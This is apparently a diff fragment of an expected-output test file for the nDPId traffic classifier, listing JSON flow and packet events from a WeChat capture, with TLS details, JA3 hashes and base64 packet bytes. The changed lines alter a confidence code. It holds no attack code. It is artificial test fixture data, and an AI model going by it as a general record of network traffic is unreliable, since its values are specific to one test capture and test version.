-01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167380581,"flow_last_seen":1492167381212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167381212,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167380581,"flow_last_seen":1492167380894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167380894,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":286,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167380581,"flow_last_seen":1492167381212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167381212,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167380581,"flow_last_seen":1492167381212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167381212,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167382020,"flow_last_seen":1492167382020,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167382020,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1492167382020,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167382020,"pkt":"8IQvSpdgeJKcD6iOCABFAAAokulAAEAGgjbAqAFny82X058kAbutvz98aYB+jlAQAdESKQAA"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1492167382374,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1492167382374,"pkt":"eJKcD6iO8IQvSpdgCABFoAAoL8xAAC4G9rPLzZfTwKgBZwG7nyRpgH6Orb8\/fVAQAIMTdgAAAADZK2u8"} -00646{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":342,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167353674,"flow_last_seen":1492167387855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":11088,"flow_avg_l4_payload_len":346,"midstream":1,"thread_ts_msec":1492167387855,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00646{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":342,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167353674,"flow_last_seen":1492167387855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":11088,"flow_avg_l4_payload_len":346,"midstream":1,"thread_ts_msec":1492167387855,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1492167397120,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167397120,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ePJAAEAGFx3AqAFnQOmnvIyxFGy60MyoSq1b+oAQAO0gQAAAAQEICgAw5QaFnXDI"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167400812,"flow_last_seen":1492167400812,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167400812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1492167400812,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167400812,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8voBAAEAGVrzAqAFny82XotNRAbuSN1YhAAAAAKACchAKOQAAAgQFtAQCCAoAMOihAAAAAAEDAwc="} @@ -139,69 +139,69 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1492167401063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167401063,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8\/z9AAEAGFf3AqAFny82XotNSAbu9GRfgAAAAAKACchAdWQAAAgQFtAQCCAoAMOjfAAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1492167401175,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167401175,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701Ey6mUDkjdWIqASN8j5bgAAAgQFoAQCCApFrW16ADDooQEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1492167401175,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167401175,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0voFAAEAGVsPAqAFny82XotNRAbuSN1YiMuplBIAQAOVesAAAAQEICgAw6PtFrW16"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167400812,"flow_last_seen":1492167401176,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167401176,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167400812,"flow_last_seen":1492167401176,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167401176,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1492167401410,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167401410,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701JpITMTvRkX4aASN8iiggAAAgQFoAQCCApF0dMbADDo3wEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1492167401410,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167401410,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0\/0BAAEAGFgTAqAFny82XotNSAbu9GRfhaSEzFIAQAOUHxwAAAQEICgAw6TZF0dMb"} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":366,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167400812,"flow_last_seen":1492167401535,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167401535,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167400812,"flow_last_seen":1492167401537,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167401537,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":366,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167400812,"flow_last_seen":1492167401535,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167401535,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167400812,"flow_last_seen":1492167401537,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167401537,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1492167402013,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1492167402013,"pkt":"eJKcD6iO8IQvSpdgCABFoABHL81AAC4G9pPLzZfTwKgBZwG7nyRpgH6Orb8\/fVAYAIMZWAAAFQMDABoY8p0q0Neyx8LzFoDelCtviTdTs0pFnXUR7g=="} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167382020,"flow_last_seen":1492167402013,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1492167402013,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167401063,"flow_last_seen":1492167402310,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167402310,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167401063,"flow_last_seen":1492167402665,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167402665,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167401063,"flow_last_seen":1492167402666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167402666,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167382020,"flow_last_seen":1492167402013,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1492167402013,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167401063,"flow_last_seen":1492167402310,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167402310,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167401063,"flow_last_seen":1492167402665,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167402665,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167401063,"flow_last_seen":1492167402666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167402666,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 